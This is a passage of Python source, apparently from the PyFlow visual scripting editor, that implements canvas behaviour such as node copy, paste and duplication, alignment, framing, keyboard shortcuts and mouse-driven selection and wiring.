for i in outputPins:
newPinName = self.graphManager.getUniqName(i.owningNode().name)
newPin = graphOutputs.onAddInPin(newPinName, i.dataType)
newOutputPins[i] = newPin
for n in outputConectionList[i]:
node = self.findNode(n[0])
self.connectPinsInternal(newPin, node.getPinSG(n[1]))
def connectPins(compoundNode, inputs, outputs):
for o in inputs:
exposedPin = compoundNode.getPinSG(newInputPins[o].name)
if exposedPin:
self.connectPinsInternal(exposedPin, o)
for i in outputs:
exposedPin = compoundNode.getPinSG(newOutputPins[i].name)
if exposedPin:
self.connectPinsInternal(i, exposedPin)
EditorHistory().saveState("Collapse to compound", modify=True)
QtCore.QTimer.singleShot(1, lambda: connectPins(uiCompoundNode, inputPins, outputPins))
self.graphManager.selectGraphByName(activeGraphName)
def populateMenu(self):
self.actionCollapseSelectedNodes = self.menu.addAction("Collapse selected nodes")
self.actionCollapseSelectedNodes.triggered.connect(lambda: self.setSelectedNodesCollapsed(True))
self.menu.addAction(self.actionCollapseSelectedNodes)
self.actionExpandSelectedNodes = self.menu.addAction("Expand selected nodes")
self.actionExpandSelectedNodes.triggered.connect(lambda: self.setSelectedNodesCollapsed(False))
self.menu.addAction(self.actionExpandSelectedNodes)
self.actionCollapseSelectedNodesToCompound = self.menu.addAction("Collapse to compound")
self.actionCollapseSelectedNodesToCompound.triggered.connect(self.collapseSelectedNodesToCompound)
self.menu.addAction(self.actionCollapseSelectedNodesToCompound)
def plot(self):
self.graphManager.plot()
def location(self):
return self.graphManager.location()
def __del__(self):
# self.tick_timer.stop()
pass
def createVariable(self, dataType='AnyPin', accessLevel=AccessLevel.public, uid=None):
return self.graphManager.activeGraph().createVariable(dataType=dataType, accessLevel=accessLevel, uid=uid)
@property
def nodes(self):
"""returns all ui nodes dict including compounds
"""
result = {}
for rawNode in self.graphManager.getAllNodes():
uiNode = rawNode.getWrapper()
if uiNode is None:
print("{0} has not UI wrapper".format(rawNode.name))
if rawNode.uid in result:
rawNode.uid = uuid.uuid4()
result[rawNode.uid] = uiNode
return result
@property
def pins(self):
"""Returns UI pins dict {uuid: UIPinBase}
"""
result = {}
for node in self.graphManager.getAllNodes():
for pin in node.pins:
result[pin.uid] = pin.getWrapper()()
return result
@property
def connections(self):
return self._UIConnections
def getAllNodes(self):
"""returns all ui nodes list
"""
return list(self.nodes.values())
def showNodeBox(self, pinDirection=None, pinStructure=PinStructure.Single):
self.node_box.show()
self.node_box.move(QtGui.QCursor.pos())
self.node_box.treeWidget.refresh('', pinDirection, pinStructure)
self.node_box.lineEdit.blockSignals(True)
self.node_box.lineEdit.setText("")
self.node_box.lineEdit.blockSignals(False)
self.node_box.lineEdit.setFocus()
def hideNodeBox(self):
self.node_box.hide()
self.node_box.lineEdit.clear()
def shoutDown(self, *args, **kwargs):
for ed in self.codeEditors.values():
ed.deleteLater()
self.scene().clear()
self._UIConnections.clear()
self.hideNodeBox()
for node in self.nodes.values():
node.shoutDown()
def mouseDoubleClickEvent(self, event):
QGraphicsView.mouseDoubleClickEvent(self, event)
self.OnDoubleClick(self.mapToScene(event.pos()))
event.accept()
def OnDoubleClick(self, pos):
pass
def Tick(self, deltaTime):
if self.autoPanController.isActive():
delta = self.autoPanController.getDelta() * -1
self.pan(delta)
for e in list(self.connections.values()):
e.Tick()
def isShortcutsEnabled(self):
return self._sortcuts_enabled
def disableSortcuts(self):
self._sortcuts_enabled = False
def enableSortcuts(self):
self._sortcuts_enabled = True
def onNewFile(self, keepRoot=True):
self.getApp().undoStack.clear()
self.shoutDown()
def getPinByFullName(self, full_name):
node_name = full_name.split('.')[0]
pinName = full_name.split('.')[1]
node = self.findNode(node_name)
if node:
Pin = node.getPinSG(pinName)
if Pin:
return Pin
def frameRect(self, nodesRect):
if nodesRect is None:
return
windowRect = self.mapToScene(self.rect()).boundingRect()
# pan to center of window
delta = windowRect.center() - nodesRect.center()
delta *= self.currentViewScale()
self.pan(delta)
# zoom to fit content
ws = windowRect.size()
nodesRect += QtCore.QMargins(0, 20, 150, 20)
rs = nodesRect.size()
widthRef = ws.width()
heightRef = ws.height()
sx = widthRef / nodesRect.width()
sy = heightRef / nodesRect.height()
scale = sx if sy > sx else sy
self.zoom(scale)
return scale
def ensureNodesRectAlmostEqualWindowRect(self, tolerance=10.0):
windowRect = self.mapToScene(self.rect()).boundingRect()
nodesRect = self.getNodesRect()
errorPoint = windowRect.topLeft() - nodesRect.topLeft()
error = abs(errorPoint.x() + errorPoint.y())
return error < tolerance
def frameSelectedNodes(self):
self.frameRect(self.getNodesRect(True))
self.frameRect(self.getNodesRect(True))
def frameAllNodes(self):
rect = self.getNodesRect()
if rect is not None:
self.frameRect(rect)
if not self.ensureNodesRectAlmostEqualWindowRect():
self.frameRect(self.getNodesRect())
def getNodesRect(self, selected=False, activeGraphOnly=True):
rectangles = []
if selected:
for n in [n for n in self.getAllNodes() if n.isSelected()]:
if activeGraphOnly:
if n._rawNode.graph() != self.graphManager.activeGraph():
continue
n_rect = QtCore.QRectF(n.scenePos(), QtCore.QPointF(n.scenePos().x() + float(n.w), n.scenePos().y() + float(n.h)))
rectangles.append([n_rect.x(), n_rect.y(), n_rect.bottomRight().x(), n_rect.bottomRight().y()])
else:
for n in self.getAllNodes():
if activeGraphOnly:
if n._rawNode.graph() != self.graphManager.activeGraph():
continue
n_rect = QtCore.QRectF(n.scenePos(), QtCore.QPointF(n.scenePos().x() + float(n.w), n.scenePos().y() + float(n.h)))
rectangles.append([n_rect.x(), n_rect.y(), n_rect.bottomRight().x(), n_rect.bottomRight().y()])
arr1 = [i[0] for i in rectangles]
arr2 = [i[2] for i in rectangles]
arr3 = [i[1] for i in rectangles]
arr4 = [i[3] for i in rectangles]
if any([len(arr1) == 0, len(arr2) == 0, len(arr3) == 0, len(arr4) == 0]):
return None
min_x = min(arr1)
max_x = max(arr2)
min_y = min(arr3)
max_y = max(arr4)
return QtCore.QRect(QtCore.QPoint(min_x, min_y), QtCore.QPoint(max_x, max_y))
def selectedNodes(self):
allNodes = self.getAllNodes()
assert(None not in allNodes), "Bad nodes!"
return [i for i in allNodes if i.isSelected()]
def selectedConnections(self):
return [i for i in self.connections.values() if i.isSelected()]
def clearSelection(self):
for node in self.selectedNodes():
node.setSelected(False)
for connection in self.selectedConnections():
connection.setSelected(False)
def killSelectedConnections(self):
self.removeEdgeCmd(self.selectedConnections())
def killSelectedNodes(self):
selectedNodes = self.selectedNodes()
if self.isShortcutsEnabled() and len(selectedNodes) > 0:
for node in selectedNodes:
node._rawNode.kill()
self.requestClearProperties.emit()
def keyPressEvent(self, event):
modifiers = event.modifiers()
currentInputAction = InputAction("temp", InputActionType.Keyboard, "temp", key=event.key(), modifiers=modifiers)
self.currentPressedKey = event.key()
if self.isShortcutsEnabled():
if all([event.key() == QtCore.Qt.Key_C, modifiers == QtCore.Qt.NoModifier]):
# create comment node
rect = self.getNodesRect(True)
if rect:
rect.setTop(rect.top() - 30)
rect.setLeft(rect.left() - 30)
rect.setRight(rect.right() + 100)
rect.setBottom(rect.bottom() + 30)
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['package'] = "PyFlowBase"
nodeTemplate['type'] = commentNode.__name__
nodeTemplate['name'] = commentNode.__name__
if rect:
nodeTemplate['x'] = rect.topLeft().x()
nodeTemplate['y'] = rect.topLeft().y()
else:
nodeTemplate['x'] = self.mapToScene(self.mousePos).x()
nodeTemplate['y'] = self.mapToScene(self.mousePos).y()
nodeTemplate['meta']['label'] = commentNode.__name__
nodeTemplate['uuid'] = str(uuid.uuid4())
instance = self.createNode(nodeTemplate)
if rect:
instance._rect.setRight(rect.width())
instance._rect.setBottom(rect.height())
instance.updateNodeShape()
for node in self.selectedNodes():
node.updateOwningCommentNode()
if currentInputAction in InputManager()["Canvas.AlignLeft"]:
self.alignSelectedNodes(Direction.Left)
return
if currentInputAction in InputManager()["Canvas.AlignTop"]:
self.alignSelectedNodes(Direction.Up)
return
if currentInputAction in InputManager()["Canvas.AlignRight"]:
self.alignSelectedNodes(Direction.Right)
return
if currentInputAction in InputManager()["Canvas.AlignBottom"]:
self.alignSelectedNodes(Direction.Down)
return
if currentInputAction in InputManager()["Canvas.Undo"]:
self.getApp().edHistory.undo()
if currentInputAction in InputManager()["Canvas.Redo"]:
self.getApp().edHistory.redo()
if currentInputAction in InputManager()["Canvas.FrameSelected"]:
self.frameSelectedNodes()
if currentInputAction in InputManager()["Canvas.FrameAll"]:
self.frameAllNodes()
if currentInputAction in InputManager()["Canvas.ZoomIn"]:
self.zoomDelta(True)
if currentInputAction in InputManager()["Canvas.ZoomOut"]:
self.zoomDelta(False)
if currentInputAction in InputManager()["Canvas.ResetScale"]:
self.reset_scale()
if currentInputAction in InputManager()["Canvas.KillSelected"]:
self.killSelectedNodes()
self.killSelectedConnections()
EditorHistory().saveState("Kill selected", modify=True)
if currentInputAction in InputManager()["Canvas.CopyNodes"]:
self.copyNodes()
if currentInputAction in InputManager()["Canvas.CutNodes"]:
self.cutNodes()
if currentInputAction in InputManager()["Canvas.DuplicateNodes"]:
self.duplicateNodes()
if currentInputAction in InputManager()["Canvas.PasteNodes"]:
self.pasteNodes()
EditorHistory().saveState("Paste nodes", modify=True)
QGraphicsView.keyPressEvent(self, event)
def duplicateNodes(self):
copiedJson = self.copyNodes()
self.pasteNodes(data=copiedJson)
EditorHistory().saveState("Duplicate nodes", modify=True)
def makeSerializedNodesUnique(self, nodes, extra=[]):
copiedNodes = deepcopy(nodes)
# make names unique
renameData = {}
existingNames = self.graphManager.getAllNames() + extra
for node in copiedNodes:
newName = getUniqNameFromList(existingNames, node['name'])
existingNames.append(newName)
renameData[node['name']] = newName
# rename old name in header data
node["wrapper"]["headerHtml"] = node["wrapper"]["headerHtml"].replace(node['name'], newName)
node['name'] = newName
node['uuid'] = str(uuid.uuid4())
for inp in node['inputs']:
inp['fullName'] = '{0}_{1}'.format(node['name'], inp['name'])
inp['uuid'] = str(uuid.uuid4())
for out in node['outputs']:
out['fullName'] = '{0}_{1}'.format(node['name'], out['name'])
out['uuid'] = str(uuid.uuid4())
# update connections
for node in copiedNodes:
for out in node['outputs']:
for linkedToData in out['linkedTo']:
lhsNodeName = linkedToData["lhsNodeName"]
rhsNodeName = linkedToData["rhsNodeName"]
if lhsNodeName in renameData:
linkedToData["lhsNodeName"] = renameData[lhsNodeName]
if rhsNodeName in renameData:
linkedToData["rhsNodeName"] = renameData[rhsNodeName]
for inp in node['inputs']:
for linkedToData in inp['linkedTo']:
lhsNodeName = linkedToData["lhsNodeName"]
rhsNodeName = linkedToData["rhsNodeName"]
if lhsNodeName in renameData:
linkedToData["lhsNodeName"] = renameData[lhsNodeName]
if rhsNodeName in renameData:
linkedToData["rhsNodeName"] = renameData[rhsNodeName]
for node in copiedNodes:
if node['type'] == 'compound':
node['graphData']['nodes'] = self.makeSerializedNodesUnique(node['graphData']['nodes'], extra=existingNames)
return copiedNodes
def cutNodes(self):
self.copyNodes()
self.killSelectedNodes()
def copyNodes(self, toClipBoard=True):
nodes = []
selectedNodes = [i for i in self.nodes.values() if i.isSelected()]
for node in selectedNodes:
if node.isCommentNode and node.collapsed:
selectedNodes.extend(node.owningNodes)
if len(selectedNodes) == 0:
return
for n in selectedNodes:
nodeJson = n.serialize()
nodes.append(nodeJson)
serializedNodeNames = [i["name"] for i in nodes]
for nodeJson in nodes:
for outJson in nodeJson["outputs"]:
outJson["linkedTo"] = []
for inpJson in nodeJson["inputs"]:
for link in (inpJson["linkedTo"]):
if inpJson["dataType"] == "ExecPin":
if link["lhsNodeName"] not in serializedNodeNames:
inpJson["linkedTo"].remove(link)
if len(nodes) > 0:
copyJsonStr = json.dumps(nodes)
if toClipBoard:
QApplication.clipboard().clear()
QApplication.clipboard().setText(copyJsonStr)
return copyJsonStr
def pasteNodes(self, move=True, data=None):
if not data:
nodes = None
try:
nodes = json.loads(QApplication.clipboard().text())
except json.JSONDecodeError as err:
return
else:
nodes = json.loads(data)
existingNames = self.graphManager.getAllNames()
nodes = self.makeSerializedNodesUnique(nodes, extra=existingNames)
diff = QtCore.QPointF(self.mapToScene(self.mousePos)) - QtCore.QPointF(nodes[0]["x"], nodes[0]["y"])
self.clearSelection()
newNodes = {}
nodesData = deepcopy(nodes)
createdNodes = {}
for node in nodesData:
n = self._createNode(node)
if n is None:
continue
createdNodes[n] = node
if n is None:
continue
n.setSelected(True)
if move:
n.setPos(n.scenePos() + diff)
for nodeJson in nodesData:
for inpPinJson in nodeJson['inputs']:
linkDatas = inpPinJson['linkedTo']
for linkData in linkDatas:
try:
lhsNode = self.findNode(linkData["lhsNodeName"])
lhsNodePinId = linkData["outPinId"]
lhsPin = lhsNode.orderedOutputs[lhsNodePinId]
rhsNode = self.findNode(nodeJson["name"])
rhsNodePinId = linkData["inPinId"]
rhsPin = rhsNode.orderedInputs[rhsNodePinId]
connected = connectPins(lhsPin, rhsPin)
if connected:
self.createUIConnectionForConnectedPins(lhsPin.getWrapper()(), rhsPin.getWrapper()())
except Exception as e:
print(inpPinJson['fullName'], "not found")
continue
# Hacks here!!
# All nodes are copied. Nodes now do not know about under which comments they are
# Expand all coped comments first
for newNode, data in createdNodes.items():
if newNode.isCommentNode:
newNode.collapsed = False
# Non comment nodes now can update owning comments
for newNode, data in createdNodes.items():
newNode.updateOwningCommentNode()
# Restore comments collapsed state
for newNode, data in createdNodes.items():
if newNode.isCommentNode:
newNode.collapsed = data["wrapper"]["collapsed"]
def findNode(self, name):
for node in self.nodes.values():
if name == node.name:
return node
return None
def alignSelectedNodes(self, direction):
ls = [n for n in self.getAllNodes() if n.isSelected()]
x_positions = [p.scenePos().x() for p in ls]
y_positions = [p.scenePos().y() for p in ls]
if direction == Direction.Left:
if len(x_positions) == 0:
return
x = min(x_positions)
for n in ls:
p = n.scenePos()
p.setX(x)
n.setPos(p)
if direction == Direction.Right:
if len(x_positions) == 0:
return
x = max(x_positions)
for n in ls:
p = n.scenePos()
p.setX(x)
n.setPos(p)
if direction == Direction.Up:
if len(y_positions) == 0:
return
y = min(y_positions)
for n in ls:
p = n.scenePos()
p.setY(y)
n.setPos(p)
if direction == Direction.Down:
if len(y_positions) == 0:
return
y = max(y_positions)
for n in ls:
p = n.scenePos()
p.setY(y)
n.setPos(p)
EditorHistory().saveState("Align nodes", modify=True)
def findGoodPlaceForNewNode(self):
polygon = self.mapToScene(self.viewport().rect())
ls = polygon.toList()
point = QtCore.QPointF(
(ls[1].x() - ls[0].x()) / 2, (ls[3].y() - ls[2].y()) / 2)
point += ls[0]
point.setY(point.y() + polygon.boundingRect().height() / 3)
point += QtCore.QPointF(float(random.randint(50, 200)),
float(random.randint(50, 200)))
return point
def keyReleaseEvent(self, event):
QGraphicsView.keyReleaseEvent(self, event)
self.currentPressedKey = None
def nodeFromInstance(self, instance):
if isinstance(instance, UINodeBase):
return instance
node = instance
while (isinstance(node, QGraphicsItem) or isinstance(node, QGraphicsWidget) or isinstance(node, QGraphicsProxyWidget)) and node.parentItem():
node = node.parentItem()
if isinstance(node, UINodeBase):
return node
else:
return None
def getReruteNode(self, pos, connection=None):
nodeClassName = "reroute"
if connection and connection.drawSource._rawPin.isExec() and connection.drawDestination._rawPin.isExec():
nodeClassName = "rerouteExecs"
else:
if self.pressedPin and self.pressedPin.isExec():
nodeClassName = "rerouteExecs"
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['package'] = "PyFlowBase"
nodeTemplate['lib'] = None
nodeTemplate['type'] = nodeClassName
nodeTemplate['name'] = "reroute"
nodeTemplate['x'] = self.mapToScene(pos).x()
nodeTemplate['y'] = self.mapToScene(pos).y()
nodeTemplate['uuid'] = str(uuid.uuid4())
nodeTemplate['meta']['label'] = "reroute"
reruteNode = self.createNode(nodeTemplate)
reruteNode.translate(-reruteNode.boundingRect().center().x(), -5)
return reruteNode
def getInputNode(self):
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['package'] = "PyFlowBase"
nodeTemplate['lib'] = None
nodeTemplate['type'] = "graphInputs"
nodeTemplate['name'] = "graphInputs"
nodeTemplate['x'] = self.boundingRect.left() + 50
nodeTemplate['y'] = self.boundingRect.center().y() + 50
nodeTemplate['uuid'] = str(uuid.uuid4())
nodeTemplate['meta']['label'] = "Inputs"
node = self.createNode(nodeTemplate)
node.translate(-20, 0)
return node
def getOutputNode(self):
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['package'] = "PyFlowBase"
nodeTemplate['lib'] = None
nodeTemplate['type'] = "graphOutputs"
nodeTemplate['name'] = "graphOutputs"
nodeTemplate['x'] = self.boundingRect.width() - 50
nodeTemplate['y'] = self.boundingRect.center().y() + 50
nodeTemplate['uuid'] = str(uuid.uuid4())
nodeTemplate['meta']['label'] = "Outputs"
node = self.createNode(nodeTemplate)
node.translate(-20, 0)
return node
def validateConnections(self, graph):
"""Hides show if needed. Changes endpoints positions if needed
"""
checked = set()
for node in graph.getNodesList():
uiNode = node.getWrapper()
for pin in uiNode.UIPins.values():
for connection in pin.uiConnectionList:
if connection in checked:
continue
# override src endpoint to comment left side if connected
# node is hidden and under collapsed comment
srcNode = connection.source().owningNode()
if srcNode.isUnderActiveGraph():
comment = srcNode.owningCommentNode
if comment is not None and comment.collapsed and not srcNode.isVisible():
connection.sourcePositionOverride = comment.getRightSideEdgesPoint
# override dst endpoint to comment right side if connected
# node is hidden and under collapsed comment
dstNode = connection.destination().owningNode()
if dstNode.isUnderActiveGraph():
comment = dstNode.owningCommentNode
if comment is not None and comment.collapsed and not dstNode.isVisible():
connection.destinationPositionOverride = comment.getLeftSideEdgesPoint
if connection.isUnderCollapsedComment():
connection.hide()
if not connection.source().owningNode().isUnderActiveGraph() or not connection.destination().owningNode().isUnderActiveGraph():
connection.hide()
checked.add(connection)
def validateCommentNodesOwnership(self, graph, bExpandComments=True):
state = self.state
self.state = CanvasState.COMMENT_OWNERSHIP_VALIDATION
comments = {}
defaultNodes = set()
# expand all comment nodes and reset owning nodes info
for node in graph.getNodesList():
uiNode = node.getWrapper()
if uiNode.isUnderActiveGraph():
if uiNode.isCommentNode:
comments[uiNode] = uiNode.collapsed
if not uiNode.collapsed:
if bExpandComments:
uiNode.collapsed = False
uiNode.owningNodes.clear()
else:
defaultNodes.add(uiNode)
# apply comment to comment membership
for commentNode in comments:
commentNode.updateOwningCommentNode()
# apply node to comment membership
for node in defaultNodes:
node.updateOwningCommentNode()
# restore comments collapse state
for comment, wasCollapsed in comments.items():
comment.collapsed = wasCollapsed
self.state = state
def mousePressEvent(self, event):
self.pressed_item = self.itemAt(event.pos())
node = self.nodeFromInstance(self.pressed_item)
self.pressedPin = self.findPinNearPosition(event.pos())
modifiers = event.modifiers()
self.mousePressPose = event.pos()
expandComments = False
self.validateCommentNodesOwnership(self.graphManager.activeGraph(), expandComments)
currentInputAction = InputAction("temp", "temp", InputActionType.Mouse, event.button(), modifiers=modifiers)
if any([not self.pressed_item,
isinstance(self.pressed_item, UIConnection) and modifiers != QtCore.Qt.AltModifier,
isinstance(self.pressed_item, UINodeBase) and node.isCommentNode and not node.collapsed,
isinstance(node, UINodeBase) and (node.resizable and node.shouldResize(self.mapToScene(event.pos()))["resize"])]):
self.resizing = False
# Create branch on B + LMB
if self.currentPressedKey is not None and event.button() == QtCore.Qt.LeftButton:
if self.currentPressedKey == QtCore.Qt.Key_B:
spawnPos = self.mapToScene(self.mousePressPose)
self.spawnNode("branch", spawnPos.x(), spawnPos.y())
if isinstance(node, UINodeBase) and (node.isCommentNode or node.resizable):
super(Canvas, self).mousePressEvent(event)
self.resizing = node.bResize
node.setSelected(False)
if not self.resizing:
if isinstance(self.pressed_item, UIConnection) and modifiers == QtCore.Qt.NoModifier and event.button() == QtCore.Qt.LeftButton:
closestPin = self.findPinNearPosition(event.pos(), 20)
if closestPin is not None:
if closestPin.direction == PinDirection.Input:
self.pressed_item.destinationPositionOverride = lambda: self.mapToScene(self.mousePos)
elif closestPin.direction == PinDirection.Output:
self.pressed_item.sourcePositionOverride = lambda: self.mapToScene(self.mousePos)
self.reconnectingWires.add(self.pressed_item)
elif event.button() == QtCore.Qt.LeftButton and modifiers in [QtCore.Qt.NoModifier, QtCore.Qt.ShiftModifier, QtCore.Qt.ControlModifier, QtCore.Qt.ControlModifier | QtCore.Qt.ShiftModifier]:
self.manipulationMode = CanvasManipulationMode.SELECT
self._selectionRect = SelectionRect(graph=self, mouseDownPos=self.mapToScene(event.pos()), modifiers=modifiers)
self._selectionRect.selectFullyIntersectedItems = True
self._mouseDownSelection = [node for node in self.selectedNodes()]
self._mouseDownConnectionsSelection = [node for node in self.selectedConnections()]
if modifiers not in [QtCore.Qt.ShiftModifier, QtCore.Qt.ControlModifier]:
self.clearSelection()
else:
if hasattr(self, "_selectionRect") and self._selectionRect is not None:
self._selectionRect.destroy()
self._selectionRect = None
LeftPaning = event.button() == QtCore.Qt.LeftButton and modifiers == QtCore.Qt.AltModifier
if currentInputAction in InputManager()["Canvas.Pan"]:
self.manipulationMode = CanvasManipulationMode.PAN
self._lastPanPoint = self.mapToScene(event.pos())
elif currentInputAction in InputManager()["Canvas.Zoom"]:
self.manipulationMode = CanvasManipulationMode.ZOOM
self._lastTransform = QtGui.QTransform(self.transform())
self._lastSceneRect = self.sceneRect()
self._lastSceneCenter = self._lastSceneRect.center()
self._lastScenePos = self.mapToScene(event.pos())
self._lastOffsetFromSceneCenter = self._lastScenePos - self._lastSceneCenter
self.node_box.hide()
else:
if not isinstance(self.pressed_item, NodesBox) and self.node_box.isVisible():
self.node_box.hide()
self.node_box.lineEdit.clear()
if isinstance(self.pressed_item, UIPinBase) and not type(self.pressed_item) is PinGroup:
if event.button() == QtCore.Qt.LeftButton and modifiers == QtCore.Qt.NoModifier:
self.pressed_item.topLevelItem().setFlag(QGraphicsItem.ItemIsMovable, False)
self.pressed_item.topLevelItem().setFlag(QGraphicsItem.ItemIsSelectable, False)
self._drawRealtimeLine = True
self.autoPanController.start()
elif event.button() == QtCore.Qt.LeftButton and modifiers == QtCore.Qt.ControlModifier:
for wire in self.pressed_item.uiConnectionList:
if self.pressed_item.direction == PinDirection.Input:
wire.destinationPositionOverride = lambda: self.mapToScene(self.mousePos)
elif self.pressed_item.direction == PinDirection.Output:
wire.sourcePositionOverride = lambda: self.mapToScene(self.mousePos)
self.reconnectingWires.add(wire)
if currentInputAction in InputManager()["Canvas.DisconnectPin"]:
self.removeEdgeCmd(self.pressed_item.connections)
self._drawRealtimeLine = False
else:
if isinstance(self.pressed_item, UIConnection) and modifiers == QtCore.Qt.AltModifier:
reruteNode = self.getReruteNode(event.pos(), self.pressed_item)
self.clearSelection()
reruteNode.setSelected(True)
for inp in reruteNode.UIinputs.values():
if canConnectPins(self.pressed_item.source()._rawPin, inp._rawPin):
drawPin = self.pressed_item.drawSource
if self.pressed_item.source().isExec():
self.pressed_item.kill()
self.connectPins(self.pressed_item.source(), inp)
for conection in inp.connections:
conection.drawSource = drawPin
break
for out in reruteNode.UIoutputs.values():
drawPin = self.pressed_item.drawDestination
if canConnectPins(out._rawPin, self.pressed_item.destination()._rawPin):
self.connectPins(out, self.pressed_item.destination())
for conection in out.connections:
conection.drawDestination = drawPin
break
self.pressed_item = reruteNode
self.manipulationMode = CanvasManipulationMode.MOVE
else:
if isinstance(self.pressed_item, UINodeBase) and node.isCommentNode:
if node.bResize:
return
if type(self.pressed_item) is PinGroup:
self.pressed_item.onClick()
return
if currentInputAction in InputManager()["Canvas.DragChainedNodes"]:
if node.isCommentNode:
self.manipulationMode = CanvasManipulationMode.PAN
return
if modifiers != QtCore.Qt.ShiftModifier:
self.clearSelection()
node.setSelected(True)
selectedNodes = self.selectedNodes()
if len(selectedNodes) > 0:
for snode in selectedNodes:
for n in node.getChainedNodes():
n.setSelected(True)
snode.setSelected(True)
else:
if modifiers in [QtCore.Qt.NoModifier, QtCore.Qt.AltModifier]:
super(Canvas, self).mousePressEvent(event)
if modifiers == QtCore.Qt.ControlModifier and event.button() == QtCore.Qt.LeftButton:
node.setSelected(not node.isSelected())
if modifiers == QtCore.Qt.ShiftModifier:
node.setSelected(True)
if currentInputAction in InputManager()["Canvas.DragNodes"]:
self.manipulationMode = CanvasManipulationMode.MOVE
if self.pressed_item.objectName() == "MouseLocked":
super(Canvas, self).mousePressEvent(event)
if currentInputAction in InputManager()["Canvas.DragCopyNodes"]:
self.manipulationMode = CanvasManipulationMode.COPY
def pan(self, delta):
rect = self.sceneRect()
scale = self.currentViewScale()
x = -delta.x() / scale
y = -delta.y() / scale
rect.translate(x, y)
self.setSceneRect(rect)
self.update()
def updateRerutes(self, event, showPins=False):
tolerance = 9 * self.currentViewScale()
mouseRect = QtCore.QRect(QtCore.QPoint(event.pos().x() - tolerance, event.pos().y() - tolerance),
QtCore.QPoint(event.pos().x() + tolerance, event.pos().y() + tolerance))
hoverItems = self.items(mouseRect)
self.hoveredRerutes += [node for node in hoverItems if isinstance(node, UIRerouteNodeSmall)]
for node in self.hoveredRerutes:
if showPins:
if node in hoverItems:
node.showPins()
else:
node.hidePins()
self.hoveredRerutes.remove(node)
else:
node.hidePins()
self.hoveredRerutes.remove(node)
def mouseMoveEvent(self, event):
self.mousePos = event.pos()
mouseDelta = QtCore.QPointF(self.mousePos) - self._lastMousePos
modifiers = event.modifiers()
node = self.nodeFromInstance(self.itemAt(event.pos()))
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
if self.itemAt(event.pos()) and isinstance(node, UINodeBase) and node.resizable:
resizeOpts = node.shouldResize(self.mapToScene(event.pos()))
if resizeOpts["resize"] or node.bResize:
if resizeOpts["direction"] in [(1, 0), (-1, 0)]:
self.viewport().setCursor(QtCore.Qt.SizeHorCursor)
elif resizeOpts["direction"] in [(0, 1), (0, -1)]:
self.viewport().setCursor(QtCore.Qt.SizeVerCursor)
elif resizeOpts["direction"] in [(1, 1), (-1, -1)]:
self.viewport().setCursor(QtCore.Qt.SizeFDiagCursor)
elif resizeOpts["direction"] in [(-1, 1), (1, -1)]:
self.viewport().setCursor(QtCore.Qt.SizeBDiagCursor)
if self._drawRealtimeLine:
if isinstance(self.pressed_item, PinBase):
if self.pressed_item.parentItem().isSelected():
self.pressed_item.parentItem().setSelected(False)
if self.realTimeLine not in self.scene().items():
self.scene().addItem(self.realTimeLine)
self.updateRerutes(event, True)
p1 = self.pressed_item.scenePos() + self.pressed_item.pinCenter()
p2 = self.mapToScene(self.mousePos)
mouseRect = QtCore.QRect(QtCore.QPoint(event.pos().x() - 5, event.pos().y() - 4),
QtCore.QPoint(event.pos().x() + 5, event.pos().y() + 4))
hoverItems = self.items(mouseRect)
hoveredPins = [pin for pin in hoverItems if isinstance(pin, UIPinBase)]
if len(hoveredPins) > 0:
item = hoveredPins[0]
if isinstance(item, UIPinBase) and isinstance(self.pressed_item, UIPinBase):
canBeConnected = canConnectPins(self.pressed_item._rawPin, item._rawPin)
self.realTimeLine.setPen(self.realTimeLineValidPen if canBeConnected else self.realTimeLineInvalidPen)
if canBeConnected:
p2 = item.scenePos() + item.pinCenter()
else:
self.realTimeLine.setPen(self.realTimeLineNormalPen)
distance = p2.x() - p1.x()
multiply = 3
path = QtGui.QPainterPath()
path.moveTo(p1)
path.cubicTo(QtCore.QPoint(p1.x() + distance / multiply, p1.y()),
QtCore.QPoint(p2.x() - distance / 2, p2.y()), p2)
self.realTimeLine.setPath(path)
if modifiers == QtCore.Qt.AltModifier:
self._drawRealtimeLine = False
if self.realTimeLine in self.scene().items():
self.removeItemByName('RealTimeLine')
reruteNode = self.getReruteNode(event.pos())
self.clearSelection()
reruteNode.setSelected(True)
for inp in reruteNode.UIinputs.values():
if canConnectPins(self.pressed_item._rawPin, inp._rawPin):
self.connectPins(self.pressed_item, inp)
break
for out in reruteNode.UIoutputs.values():
if canConnectPins(self.pressed_item._rawPin, out._rawPin):
self.connectPins(self.pressed_item, out)
break
self.pressed_item = reruteNode
self.manipulationMode = CanvasManipulationMode.MOVE
if self.manipulationMode == CanvasManipulationMode.SELECT:
dragPoint = self.mapToScene(event.pos())
self._selectionRect.setDragPoint(dragPoint, modifiers)
# This logic allows users to use ctrl and shift with rectangle
# select to add / remove nodes.
node = self.nodeFromInstance(self.pressed_item)
if isinstance(self.pressed_item, UINodeBase) and node.isCommentNode:
nodes = [node for node in self.getAllNodes() if not node.isCommentNode]
else:
nodes = self.getAllNodes()
if modifiers == QtCore.Qt.ControlModifier:
# handle nodes
for node in nodes:
if node in self._mouseDownSelection:
if node.isSelected() and self._selectionRect.collidesWithItem(node):
node.setSelected(False)
elif not node.isSelected() and not self._selectionRect.collidesWithItem(node):
node.setSelected(True)
else:
if not node.isSelected() and self._selectionRect.collidesWithItem(node):
node.setSelected(True)
elif node.isSelected() and not self._selectionRect.collidesWithItem(node):
if node not in self._mouseDownSelection:
node.setSelected(False)
# handle connections
for wire in self.connections.values():
if wire in self._mouseDownConnectionsSelection:
if wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(False)
elif not wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(True)
else:
if not wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(True)
elif wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
if wire not in self._mouseDownConnectionsSelection:
wire.setSelected(False)
elif modifiers == QtCore.Qt.ShiftModifier:
for node in nodes:
if not node.isSelected() and self._selectionRect.collidesWithItem(node):
node.setSelected(True)
elif node.isSelected() and not self._selectionRect.collidesWithItem(node):
if node not in self._mouseDownSelection:
node.setSelected(False)
for wire in self.connections.values():
